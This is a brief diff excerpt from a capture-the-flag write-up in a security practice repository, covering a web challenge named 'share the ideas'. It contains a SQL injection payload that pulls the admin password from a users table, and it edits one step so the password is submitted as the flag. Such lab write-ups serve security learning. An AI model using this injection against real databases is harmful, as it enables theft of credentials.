MdLeon-official/Cybersecurity-playground/web-security/Cyber Talents/share the ideas.md

    hhh' || (SELECT password FROM xde43_users WHERE role='admin'))--
    ```

-6. Use the retrieved password to log in as admin and solve the challenge.
+6. Submit the password as flag and solve the challenge.